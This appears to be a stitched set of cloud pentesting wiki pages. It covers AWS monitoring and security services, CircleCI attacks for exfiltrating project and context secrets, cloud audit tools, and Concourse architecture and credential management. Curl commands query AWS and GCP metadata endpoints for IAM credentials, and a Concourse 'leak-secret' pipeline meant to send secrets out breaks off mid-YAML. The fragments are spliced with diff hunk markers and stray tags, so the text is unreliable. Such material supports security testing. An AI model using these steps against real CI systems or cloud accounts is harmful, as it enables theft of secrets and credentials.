Note that in order to allow CloudTrail to send the logs to CloudWatch, a **role** needs to be created that allows that action. If possible, it's recommended to use the AWS default role to perform these actions. This role will allow CloudTrail to:
* CreateLogStream: This allows it to create CloudWatch Logs log streams
* PutLogEvents: Deliver CloudTrail logs to a CloudWatch Logs log stream

## Event History

CloudTrail Event History allows you to inspect in a table the logs that have been recorded:

![](<../.gitbook/assets/image (431).png>)
## Insights

**CloudTrail Insights** automatically **analyzes** write management events from CloudTrail trails and **alerts** you to **unusual activity**. For example, if there is an increase in `TerminateInstance` events that differs from established baselines, you'll see it as an Insight event. These events make **finding and responding to unusual API activity easier** than ever.

# CloudWatch

Amazon CloudWatch allows you to **collect all of your logs in a single repository** where you can create **metrics** and **alarms** based on the logs.\
CloudWatch Log Events have a **size limitation of 256KB per log line**.
* API calls that resulted in failed authorization
* Filters to search in CloudWatch: [https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html](https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/FilterAndPatternSyntax.html)
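As a rough intuition for the simplest case of that filter syntax (space-separated terms that must all appear in an event), here is a deliberately simplified matcher; the real syntax also supports `?`-prefixed OR terms, quoted phrases and JSON selectors:

```python
def matches_filter(pattern: str, event_message: str) -> bool:
    """Very simplified model of a CloudWatch Logs filter pattern:
    a space-separated list of terms, all of which must appear in the event."""
    return all(term in event_message for term in pattern.split())

assert matches_filter("ERROR Exception", "2022-05-01 ERROR Unhandled Exception in handler")
assert not matches_filter("ERROR Exception", "2022-05-01 INFO request ok")
```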
## Agent Installation

You can install agents inside your machines/containers to automatically send the logs back to CloudWatch.
A log group has many streams. A stream has many events. And inside of each stream, the events are guaranteed to be in order.

# Cost Explorer and Anomaly detection

This allows you to check how you are spending money on AWS services and helps you **detect anomalies**.\
Moreover, you can configure anomaly detection so AWS will warn you when some anomaly in costs is found.

## Budgets

Budgets help to manage costs and usage. You can get **alerted when a threshold is reached**.\
Also, they can be used for non-cost-related monitoring like the usage of a service (how many GB are used in a particular S3 bucket?).
# AWS Config

AWS Config **captures resource changes**, so any change to a resource supported by Config can be recorded, which will **record what changed along with other useful metadata, all held within a file known as a configuration item** (CI).\
This service is **region specific**.
**S3 is used to store** the Configuration History files and any Configuration snapshots of your data within a single bucket, which is defined within the Configuration recorder. If you have multiple AWS accounts you may want to aggregate your configuration history files into the same S3 bucket for your primary account. However, you'll need to grant write access for the service principal, config.amazonaws.com, and your secondary accounts with write access to the S3 bucket in your primary account.

## Config Rules

Config rules are a great way to help you **enforce specific compliance checks and controls across your resources**, and allow you to adopt an ideal deployment specification for each of your resource types. Each rule **is essentially a lambda function** that when called upon evaluates the resource and carries out some simple logic to determine the compliance result with the rule. **Each time a change is made** to one of your supported resources, **AWS Config will check the compliance against any config rules that you have in place**.\
AWS has a number of **predefined rules** that fall under the security umbrella that are ready to use. For example, Rds-storage-encrypted checks whether storage encryption is activated on your RDS database instances, and Encrypted-volumes checks to see if any EBS volumes that have an attached state are encrypted.
Limit of 50 config rules per region before you need to contact AWS for an increase.\
Non-compliant results are NOT deleted.

# SNS Topic

An SNS topic is used as a **configuration stream for notifications** from different AWS services like Config or CloudWatch alarms.\
You can have various endpoints associated to the SNS stream.\
You can use an SNS topic to send notifications to yourself via email or to SQS to process the notification programmatically.
# Inspector

The Amazon Inspector service is **agent based**, meaning it requires software agents to be **installed on any EC2 instances** you want to assess. This makes it an easy service to configure and add at any point to existing resources already running within your AWS infrastructure. This helps Amazon Inspector to become a seamless integration with any of your existing security processes and procedures as another level of security.
You can make any of those run on the EC2 machines you decide.

## Elements of AWS Inspector

**Role**: Create or select a role to allow Amazon Inspector to have read-only access to the EC2 instances (DescribeInstances)\
**Assessment Targets**: Group of EC2 instances that you want to run an assessment against\
Note that nowadays AWS already allows you to **autocreate** all the necessary **configurations** and even automatically **install the agents inside the EC2 instances.**
{% endhint %}

## **Reporting**
**Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings.
* The **findings report** contains the summary of the assessment, info about the EC2 instances and rules, and the findings that occurred.
* The **full report** is the findings report + a list of rules that were passed.

# Trusted Advisor

The main function of Trusted Advisor is to **recommend improvements across your AWS account** to help optimize and hone your environment based on **AWS best practices**. These recommendations cover four distinct categories. It's a cross-region service.
Trusted Advisor can send notifications and you can exclude items from it.\
Trusted Advisor data is **automatically refreshed every 24 hours**, **but** you can perform a **manual one 5 mins after the previous one.**

# Amazon GuardDuty

Amazon GuardDuty is a regional-based intelligent **threat detection service**, the first of its kind offered by AWS, which allows users to **monitor** their **AWS account** for **unusual and unexpected behavior by analyzing VPC Flow Logs, AWS CloudTrail management event logs, CloudTrail S3 data event logs, and DNS logs**. It uses **threat intelligence feeds**, such as lists of malicious IP addresses and domains, and **machine learning** to identify **unexpected and potentially unauthorized and malicious activity** within your AWS environment. This can include issues like escalations of privileges, uses of exposed credentials, or communication with malicious IP addresses or domains.\
For example, GuardDuty can detect compromised EC2 instances serving malware or mining bitcoin. It also monitors AWS account access behavior for signs of compromise, such as unauthorized infrastructure deployments, like instances deployed in a Region that has never been used, or unusual API calls, like a password policy change to reduce password strength.\
When a user disables GuardDuty, it will stop monitoring your AWS environment and it won't generate any new findings at all, and the existing findings will be lost.\
If you just stop it, the existing findings will remain.

# Amazon Macie

The main function of the service is to provide an automatic method of **detecting, identifying, and also classifying data** that you are storing within your AWS account.
It's possible to invite other accounts to Amazon Macie so several accounts share Amazon Macie.

# Route 53

You can very easily create **health checks for web pages** via Route 53. For example you can create HTTP checks on port 80 to a page to check that the web server is working.

The Route 53 service is mainly used for checking the health of the instances. To check the health of the instances we can ping a certain DNS point and we should get a response from the instance if the instances are healthy.
# CloudFront

Amazon CloudFront is AWS's **content delivery network that speeds up distribution** of your static and dynamic content through its worldwide network of edge locations. When a user requests content that you're hosting through Amazon CloudFront, the request is routed to the closest edge location, which provides the lowest latency to deliver the best performance. When **CloudFront access logs** are enabled you can record the request from each user requesting access to your website and distribution. As with S3 access logs, these logs are also **stored on Amazon S3 for durable and persistent storage**. There are no charges for enabling logging itself; however, as the logs are stored in S3, you will be charged for the storage used by S3.
**By default cookie logging is disabled** but you can enable it.

# VPC

## VPC Flow Logs

Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets, both public and private, and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between the network interfaces of your resources within your VPC**.
![](<../.gitbook/assets/image (433).png>)

## Subnets

Subnets help to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure.\
Valid CIDR ranges are from a /16 netmask to a /28 netmask.\
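A quick sketch with Python's `ipaddress` module to validate the /16–/28 rule; the usable-address count assumes AWS's behavior of reserving 5 IP addresses in every subnet:

```python
import ipaddress

def usable_aws_ips(cidr: str) -> int:
    """Number of assignable addresses in an AWS subnet of the given CIDR."""
    net = ipaddress.ip_network(cidr)
    if not 16 <= net.prefixlen <= 28:
        raise ValueError("AWS subnets must be between /16 and /28")
    # AWS reserves 5 addresses per subnet: network address, VPC router,
    # DNS, future use, and the broadcast address
    return net.num_addresses - 5

print(usable_aws_ips("10.0.1.0/24"))   # 251
print(usable_aws_ips("10.0.0.0/28"))   # 11
```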
If you are **connecting a subnet with a different subnet you cannot access the subnets connected** to the other subnet; you need to create a connection with them directly. **This also applies to internet gateways**. You cannot go through a subnet connection to access the internet; you need to assign the internet gateway to your subnet.

## VPC Peering

VPC peering allows you to **connect two or more VPCs together**, using IPv4 or IPv6, as if they were a part of the same network.
If you have **overlapping or duplicate CIDR** ranges for your VPCs, then **you'll not be able to peer the VPCs** together.\
Each AWS VPC will **only communicate with its peer**. As an example, if you have a peering connection between VPC 1 and VPC 2, and another connection between VPC 2 and VPC 3 as shown, then VPC 1 and 2 can communicate with each other directly, as can VPC 2 and VPC 3; however, VPC 1 and VPC 3 cannot. **You can't route through one VPC to get to another.**
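The non-transitivity described above can be modeled in a couple of lines:

```python
# Peering connections as undirected edges; reachability is direct-only,
# because VPC peering is NOT transitive
peerings = {("VPC1", "VPC2"), ("VPC2", "VPC3")}

def can_communicate(a: str, b: str) -> bool:
    # Only directly peered VPCs can talk; no routing through a middle VPC
    return (a, b) in peerings or (b, a) in peerings

assert can_communicate("VPC1", "VPC2")
assert can_communicate("VPC2", "VPC3")
assert not can_communicate("VPC1", "VPC3")  # no transit through VPC2
```

If VPC 1 and VPC 3 need to talk, you must add a third peering connection (or use a hub such as a transit gateway).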
# AWS Secrets Manager

AWS Secrets Manager is a great service to enhance your security posture by allowing you to **remove any hard-coded secrets within your application and replace them with a simple API call** to Secrets Manager, which then services the request with the relevant secret. As a result, AWS Secrets Manager acts as a **single source of truth for all your secrets across all of your applications**.
**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
# EMR
EMR is a managed service by AWS and is comprised of a **cluster of EC2 instances that's highly scalable** to process and run big data frameworks such as Apache Hadoop and Spark.
* Tez Shuffle Handler uses TLS.
* Spark: The Akka protocol uses TLS. Block Transfer Service uses the Simple Authentication and Security Layer (SASL) and 3DES. The external shuffle service uses SASL.
# RDS - Relational Database Service
RDS allows you to set up a **relational database** using a number of **different engines** such as MySQL, Oracle, SQL Server, etc. During the creation of your RDS database instance, you have the opportunity to **Enable Encryption at the Configure Advanced Settings** screen under Database Options and Enable Encryption.
Once the database is associated with an option group, you must ensure that the Oracle Transparent Data Encryption option is added to that group. Once this TDE option has been added to the option group, it cannot be removed. TDE can use two different encryption modes: firstly, TDE tablespace encryption, which encrypts entire tables, and, secondly, TDE column encryption, which just encrypts individual elements of the database.
# Amazon Kinesis Firehose
Amazon Kinesis Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data, such as S3, Redshift and Amazon Elasticsearch.
Kinesis SSE encryption will typically call upon KMS to **generate a new data key every five minutes**. So, if you had your stream running for a month or more, thousands of data keys would be generated within this time frame.
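A quick back-of-the-envelope check of that claim, at one data key every five minutes:

```shell
# data keys generated in a 30-day month at one key per 5 minutes
keys_per_hour=$(( 60 / 5 ))
echo $(( keys_per_hour * 24 * 30 ))   # 8640
```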
# Amazon Redshift
Redshift is a fully managed service that can scale up to over a petabyte in size and is used as a **data warehouse for big data solutions**. Using Redshift clusters, you can run analytics against your datasets using fast, SQL-based query tools and business intelligence applications to gain greater insight into your business.
Encryption for your cluster can only happen during its creation, and once encrypted, the data, metadata, and any snapshots are also encrypted. The tiering of the encryption keys is as follows: **tier one is the master key, tier two is the cluster encryption key (CEK), tier three the database encryption key (DEK), and finally tier four the data encryption keys themselves**.
## KMS
During the creation of your cluster, you can either select the **default KMS key** for Redshift or select your **own CMK**, which gives you more flexibility over the control of the key, specifically from an auditable perspective.
You can use AWS Trusted Advisor to monitor the configuration of your Amazon S3 buckets and ensure that bucket logging is enabled, which can be useful for performing security audits and tracking usage patterns in S3.
## CloudHSM
When working with CloudHSM to perform your encryption, you must first set up a trusted connection between your HSM client and Redshift using client and server certificates.
During the rotation, Redshift will rotate the CEK for your cluster and for any backups of that cluster. It will rotate a DEK for the cluster but it's not possible to rotate a DEK for the snapshots stored in S3 that have been encrypted using the DEK. It will put the cluster into a state of 'rotating keys' until the process is completed, when the status will return to 'available'.
# WAF
AWS WAF is a web application firewall that helps **protect your web applications** or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over **how traffic reaches your applications** by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define.
There are a number of essential components relating to WAF, these being: Conditions, Rules and Web access control lists, also known as Web ACLs.
## Conditions
Conditions allow you to specify **what elements of the incoming HTTP or HTTPS request you want WAF to monitor** (XSS, GEO -filtering by location-, IP address, size constraints, SQL injection attacks, string and regex matching). Note that if you are restricting a country from CloudFront, the request won't reach the WAF.
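From an enumeration point of view, the classic WAF API exposes these components directly (read permissions on WAF are assumed):

```shell
# Enumerate classic WAF resources (requires waf:List* permissions)
aws waf list-web-acls
aws waf list-rules
aws waf list-geo-match-sets
```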
You can have **100 conditions of each type**, such as Geo Match or size constraints; however, **Regex** is the **exception** to this rule, where **only 10 Regex** conditions are allowed, though this limit can be increased. You are able to have **100 rules and 50 Web ACLs per AWS account**. You are limited to **5 rate-based rules** per account. Finally, you can have **10,000 requests per second** when **using WAF** within your application load balancer.
## Rules
Using these conditions you can create rules: for example, block the request if 2 conditions are met.\
When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**.
When you select a rate-based rule option, you are asked to **enter the maximum number of requests from a single IP within a five-minute time frame**. When the count limit is **reached**, **all other requests from that same IP address are then blocked**. If the request rate falls back below the specified rate limit, the traffic is then allowed to pass through and is no longer blocked. When setting your rate limit it **must be set to a value above 2000**. Any request under this limit is considered a Regular Rule.
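A sketch of creating such a rule with the classic WAF CLI (the rule and metric names are hypothetical; note the minimum rate limit of 2000):

```shell
# Classic WAF changes require a change token
CHANGE_TOKEN=$(aws waf get-change-token --query ChangeToken --output text)
aws waf create-rate-based-rule \
    --name RateLimitPerIP --metric-name RateLimitPerIP \
    --rate-key IP --rate-limit 2000 \
    --change-token "$CHANGE_TOKEN"
```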
## Actions
An action is applied to each rule; these actions can either be **Allow**, **Block** or **Count**.
2. Blacklisted IPs as Block
3. Any bad signatures also as Block.
## CloudWatch
WAF CloudWatch metrics are reported **in one-minute intervals by default** and are kept for a two-week period. The metrics monitored are AllowedRequests, BlockedRequests, CountedRequests, and PassedRequests.
# AWS Firewall Manager
AWS Firewall Manager simplifies your administration and maintenance tasks across multiple accounts and resources for **AWS WAF, AWS Shield Advanced, Amazon VPC security groups, and AWS Network Firewall**. With Firewall Manager, you set up your AWS WAF firewall rules, Shield Advanced protections, Amazon VPC security groups, and Network Firewall firewalls just once. The service **automatically applies the rules and protections across your accounts and resources**, even as you add new resources.
**Firewall Manager policies only allow "Block" or "Count"** options for a rule group (no "Allow" option).
# AWS Shield
AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS.
Whereas the Standard version of Shield offers protection against layers three and four, **Advanced also offers protection against layer seven, application, attacks.**
# VPN
## Site-to-Site VPN
**Connect your on-premises network with your VPC.**
### Concepts
* **VPN connection**: A secure connection between your on-premises equipment and your VPCs.
* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS.
* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection.
### Limitations
* IPv6 traffic is not supported for VPN connections on a virtual private gateway.
* An AWS VPN connection does not support Path MTU Discovery.
* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks.
## Components of Client VPN <a href="#what-is-components" id="what-is-components"></a>
**Connect from your machine to your VPC**
### Concepts
* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated.
* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone.
* **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues.
* **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client.
### Limitations
* **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table.
* Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.**
* The self-service portal is **not available for clients that authenticate using mutual authentication**.
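The client CIDR block-size limits above translate to these address counts:

```shell
# addresses in the smallest (/22) and largest (/12) allowed client CIDR ranges
echo $(( 1 << (32 - 22) ))   # 1024
echo $(( 1 << (32 - 12) ))   # 1048576
```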
# Amazon Cognito
Amazon Cognito provides **authentication, authorization, and user management** for your web and mobile apps. Your users can sign in directly with a **user name and password**, or through a **third party** such as Facebook, Amazon, Google or Apple.
The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together.
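As a sketch of the identity-pool credential flow from the CLI (the pool and identity IDs below are hypothetical, and unauthenticated/guest access is assumed to be enabled):

```shell
# 1. Obtain an identity ID from the pool (no sign-in needed if guests are allowed)
aws cognito-identity get-id \
    --identity-pool-id "us-east-1:11111111-2222-3333-4444-555555555555"
# 2. Exchange the identity ID for temporary AWS credentials
aws cognito-identity get-credentials-for-identity \
    --identity-id "us-east-1:aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee"
```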
## **User pools**
A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK.
* Security features such as multi-factor authentication (MFA), checks for compromised credentials, account takeover protection, and phone and email verification.
* Customized workflows and user migration through AWS Lambda triggers.
## **Identity pools**
With an identity pool, your users can **obtain temporary AWS credentials to access AWS services**, such as Amazon S3 and DynamoDB. Identity pools support anonymous guest users, as well as the following identity providers that you can use to authenticate users for identity pools:

</details>
# Basic Information
[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuous Integration platform where you can **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo's master branch**, for example.
# Permissions
**CircleCI** **inherits the permissions** from github and bitbucket related to the **account** that logs in.\
In my testing I checked that as long as you have **write permissions over the repo in github**, you are going to be able to **manage its project settings in CircleCI** (set new ssh keys, get project api keys, create new branches with new CircleCI configs...).
However, you need to be a **repo admin** in order to **convert the repo into a CircleCI project**.
# Env Variables & Secrets
According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are different ways to **load values in environment variables** inside a workflow.
## Built-in env variables
Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`.
## Clear text
You can declare them in clear text inside a **command**:
## Project Secrets
These are **secrets** that are only going to be **accessible** by the **project** (by **any branch**).\
You can see them **declared in** _https://app.circleci.com/settings/project/github/\<org\_name>/\<repo\_name>/environment-variables_
The "**Import Variables**" functionality allows you to **import variables from other projects** into this one.
{% endhint %}
## Context Secrets
These are secrets that are **org wide**. By **default any repo** is going to be able to **access any secret** stored here:
This is currently one of the best ways to **increase the security of the secrets**, to not allow everybody to access them but just some people.
{% endhint %}
# Attacks
## Search Clear Text Secrets
If you have **access to the VCS** (like github) check the file `.circleci/config.yml` of **each repo on each branch** and **search** for potential **clear text secrets** stored in there.
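A quick way to sweep a set of locally cloned repos for such values (the directory layout is an assumption):

```shell
# Grep every repo's CircleCI config for suspicious-looking values
search_circleci_secrets() {
    for cfg in "$1"/*/.circleci/config.yml; do
        [ -f "$cfg" ] && grep -HnEi 'password|secret|token|api_?key' "$cfg"
    done
}
# usage: search_circleci_secrets /path/to/cloned/repos
```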
## Secret Env Vars & Context enumeration
Checking the code you can find **all the secrets names** that are being **used** in each `.circleci/config.yml` file. You can also get the **context names** from those files or check them in the web console: _https://app.circleci.com/settings/organization/github/\<org\_name>/contexts_.
## Exfiltrate Project secrets
{% hint style="warning" %}
In order to **exfiltrate ALL** the project and context **SECRETS** you **just** need to have **WRITE** access to **just 1 repo** in the whole github org (_and your account must have access to the contexts but by default everyone can access every context_).
## Exfiltrate Context Secrets
You need to **specify the context name** (this will also exfiltrate the project secrets):
Just creating a new `.circleci/config.yml` in a repo **isn't enough to trigger a circleci build**. You need to **enable it as a project in the circleci console**.
{% endhint %}
## Escape to Cloud
**CircleCI** gives you the option to run **your builds in their machines or in your own**.\
By default their machines are located in GCP, and you initially won't be able to find anything relevant. However, if a victim is running the tasks in **their own machines (potentially, in a cloud env)**, you might find a **cloud metadata endpoint with interesting information on it**.
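A minimal probe from within a build step, assuming the runner sits in AWS or GCP (`--max-time` keeps it from hanging elsewhere):

```shell
# AWS instance metadata (IMDSv1): lists the role name holding temporary creds
curl -s --max-time 3 http://169.254.169.254/latest/meta-data/iam/security-credentials/
# GCP metadata requires this header
curl -s --max-time 3 -H "Metadata-Flavor: Google" \
    "http://metadata.google.internal/computeMetadata/v1/?recursive=true"
```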
## Persistence
* It's possible to **create** **user tokens in CircleCI** to access the API endpoints with the users access.
* _https://app.circleci.com/settings/user/tokens_
@ -17,15 +17,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

**Check for nice cloud hacking tricks in** [**https://hackingthe.cloud**](https://hackingthe.cloud)

# Generic tools
There are several tools that can be used to test different cloud environments. The installation steps and links are indicated in this section.

## [ScoutSuite](https://github.com/nccgroup/ScoutSuite)

AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
@ -33,7 +31,7 @@ AWS, Azure, GCP, Alibaba Cloud, Oracle Cloud Infrastructure
pip3 install scoutsuite
```

## [cs-suite](https://github.com/SecurityFTW/cs-suite)

AWS, GCP, Azure, DigitalOcean
@ -46,11 +44,11 @@ pip install -r requirements.txt
python cs.py --help
```

## Nessus

Nessus has an _**Audit Cloud Infrastructure**_ scan supporting: AWS, Azure, Office 365, Rackspace, Salesforce. Some extra configuration in **Azure** is needed to obtain a **Client Id**.

## Common Sense

Take a look at the **network access rules** and detect if the services are correctly protected:
@ -59,7 +57,7 @@ Take a look to the **network access rules** and detect if the services are corre
* Unprotected admin consoles?
* In general, check that all services are correctly protected depending on their needs

# Azure

Access the portal here: [http://portal.azure.com/](http://portal.azure.com)\
To start the tests you should have access with a user with **Reader permissions over the subscription** and the **Global Reader role in AzureAD**. If even in that case you are **not able to access the content of the Storage accounts**, you can fix it with the **Storage Account Contributor** role.
@ -70,7 +68,7 @@ Then, run `az login` to login. Note the **account information** and **token** wi
Remember that if the **Security Centre Standard Pricing Tier** is being used and **not** the **free** tier, you can **generate** a **CIS compliance scan report** from the Azure portal. Go to _Policy & Compliance -> Regulatory Compliance_ (or try to access [https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22](https://portal.azure.com/#blade/Microsoft\_Azure\_Security/SecurityMenuBlade/22)).\
If the company is not paying for a Standard account you may need to review the **CIS Microsoft Azure Foundations Benchmark** by "hand" (you can get some help using the following tools). Download it from [**here**](https://www.newnettechnologies.com/cis-benchmark.html?keyword=\&gclid=Cj0KCQjwyPbzBRDsARIsAFh15JYSireQtX57C6XF8cfZU3JVjswtaLFJndC3Hv45YraKpLVDgLqEY6IaAhsZEALw\_wcB#microsoft-azure).

## Run scanners

Run the scanners to look for **vulnerabilities** and **compare** the security measures implemented with **CIS**.
@ -91,11 +89,11 @@ pip3 install azure-cis-scanner #Install
azscan #Run, login before with `az login`
```

## Attack Graph

[**Stormspotter**](https://github.com/Azure/Stormspotter) creates an “attack graph” of the resources in an Azure subscription. It enables red teams and pentesters to visualize the attack surface and pivot opportunities within a tenant, and supercharges your defenders to quickly orient and prioritize incident response work.

## More checks

* Check for a **high number of Global Admins** (2-4 are recommended). Access it on: [https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview](https://portal.azure.com/#blade/Microsoft\_AAD\_IAM/ActiveDirectoryMenuBlade/Overview)
* Global admins should have MFA activated. Go to Users and click on the Multi-Factor Authentication button.
@ -117,15 +115,15 @@ azscan #Run, login before with `az login`
_Select the SQL server_ --> _Make sure that 'Advanced data security' is set to 'On'_ --> _Under 'Vulnerability assessment settings', set 'Periodic recurring scans' to 'On', and configure a storage account for storing vulnerability assessment scan results_ --> _Click Save_

* **Lack of App Services restrictions**: Look for "App Services" in Azure ([https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites](https://portal.azure.com/#blade/HubsExtension/BrowseResource/resourceType/Microsoft.Web%2Fsites)) and check if any is being used. In that case, go through each App checking for "Access Restrictions"; if there are no rules, report it. Access to the app service should be restricted according to its needs.

# Office365

You need **Global Admin** or at least **Global Admin Reader** (but note that Global Admin Reader is a bit limited). However, those limitations appear in some PS modules and can be bypassed by accessing the features via the web application.

# AWS

Get objects in graph: [https://github.com/FSecureLABS/awspx](https://github.com/FSecureLABS/awspx)

# GCP

{% content-ref url="gcp-security/" %}
[gcp-security](gcp-security/)
@ -17,11 +17,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

**Concourse allows you to build pipelines to automatically run tests, actions and build images whenever you need it (time-based, when something happens...)**

# Concourse Architecture

Learn how the concourse environment is structured in:
@ -29,7 +27,7 @@ Learn how the concourse environment is structured in:
[concourse-architecture.md](concourse-architecture.md)
{% endcontent-ref %}

# Run Concourse Locally

Learn how you can run a concourse environment locally to do your own tests in:
@ -37,7 +35,7 @@ Learn how you can run a concourse environment locally to do your own tests in:
[concourse-lab-creation.md](concourse-lab-creation.md)
{% endcontent-ref %}

# Enumerate & Attack Concourse

Learn how you can enumerate the concourse environment and abuse it in:
@ -45,7 +43,7 @@ Learn how you can enumerate the concourse environment and abuse it in:
[concourse-enumeration-and-attacks.md](concourse-enumeration-and-attacks.md)
{% endcontent-ref %}

# References

* [https://concourse-ci.org/internals.html#architecture-worker](https://concourse-ci.org/internals.html#architecture-worker)
@ -16,19 +16,18 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# Architecture

![](<../../.gitbook/assets/image (651) (1) (1).png>)

## ATC: web UI & build scheduler

The ATC is the heart of Concourse. It runs the **web UI and API** and is responsible for all pipeline **scheduling**. It **connects to PostgreSQL**, which it uses to store pipeline data (including build logs).

The [checker](https://concourse-ci.org/checker.html)'s responsibility is to continuously check for new versions of resources. The [scheduler](https://concourse-ci.org/scheduler.html) is responsible for scheduling builds for a job and the [build tracker](https://concourse-ci.org/build-tracker.html) is responsible for running any scheduled builds. The [garbage collector](https://concourse-ci.org/garbage-collector.html) is the cleanup mechanism for removing any unused or outdated objects, such as containers and volumes.

## TSA: worker registration & forwarding

The TSA is a **custom-built SSH server** that is used solely for securely **registering** [**workers**](https://concourse-ci.org/internals.html#architecture-worker) with the [ATC](https://concourse-ci.org/internals.html#component-atc).
@ -36,7 +35,7 @@ The TSA by **default listens on port `2222`**, and is usually colocated with the
The **TSA implements a CLI over the SSH connection,** supporting [**these commands**](https://concourse-ci.org/internals.html#component-tsa).

## Workers

In order to execute tasks, Concourse must have some workers. These workers **register themselves** via the [TSA](https://concourse-ci.org/internals.html#component-tsa) and run the services [**Garden**](https://github.com/cloudfoundry-incubator/garden) and [**Baggageclaim**](https://github.com/concourse/baggageclaim).
@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>

# User Roles & Permissions

Concourse comes with five roles:
@ -35,14 +33,14 @@ Moreover, the **permissions of the roles owner, member, pipeline-operator and vi
Note that Concourse **groups pipelines inside Teams**. Therefore users belonging to a Team will be able to manage those pipelines, and **several Teams** might exist. A user can belong to several Teams and have different permissions inside each of them.

# Vars & Credential Manager

In the YAML configs you can configure values using the syntax `((`_`source-name`_`:`_`secret-path`_`.`_`secret-field`_`))`.\
The **source-name is optional**, and if omitted, the [cluster-wide credential manager](https://concourse-ci.org/vars.html#cluster-wide-credential-manager) will be used, or the value may be provided [statically](https://concourse-ci.org/vars.html#static-vars).\
The optional _**secret-field**_ specifies a field on the fetched secret to read. If omitted, the credential manager may choose to read a 'default field' from the fetched credential if the field exists.\
Moreover, the _**secret-path**_ and _**secret-field**_ may be surrounded by double quotes `"..."` if they **contain special characters** like `.` and `:`. For instance, `((source:"my.secret"."field:1"))` will set the _secret-path_ to `my.secret` and the _secret-field_ to `field:1`.
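For instance, the syntax above might show up in a pipeline's `params` like this (all source and secret names here are hypothetical):

```yaml
params:
  # No source-name: resolved by the cluster-wide credential manager (or a static var)
  DB_PASS: ((db.password))
  # source-name "vault", secret-path "concourse/main/api", secret-field "token"
  API_TOKEN: ((vault:concourse/main/api.token))
  # Quoted because the path/field contain special characters
  ODD_ONE: ((source:"my.secret"."field:1"))
```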
## Static Vars

Static vars can be specified in **task steps**:
@ -59,7 +57,7 @@ Or using the following `fly` **arguments**:
* `-i` or `--instance-var` `NAME=VALUE` parses `VALUE` as YAML and sets it as the value for the instance var `NAME`. See [Grouping Pipelines](https://concourse-ci.org/instanced-pipelines.html) to learn more about instance vars.
* `-l` or `--load-vars-from` `FILE` loads `FILE`, a YAML document mapping var names to values, and sets them all.

## Credential Management

There are different ways a **Credential Manager can be specified** in a pipeline; read how in [https://concourse-ci.org/creds.html](https://concourse-ci.org/creds.html).\
Moreover, Concourse supports several credential managers:
@ -78,11 +76,11 @@ Moreover, Concourse supports different credential managers:
Note that if you have some kind of **write access to Concourse** you can create jobs to **exfiltrate those secrets**, as Concourse needs to be able to access them.
{% endhint %}
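As a sketch of that idea, a pipeline whose job reads a secret and leaks it could look like this (the secret name `target-secret` and the collector URL are hypothetical placeholders):

```yaml
jobs:
  - name: leak-secret
    plan:
      - task: dump
        config:
          platform: linux
          image_resource:
            type: registry-image
            source: {repository: busybox}
          params:
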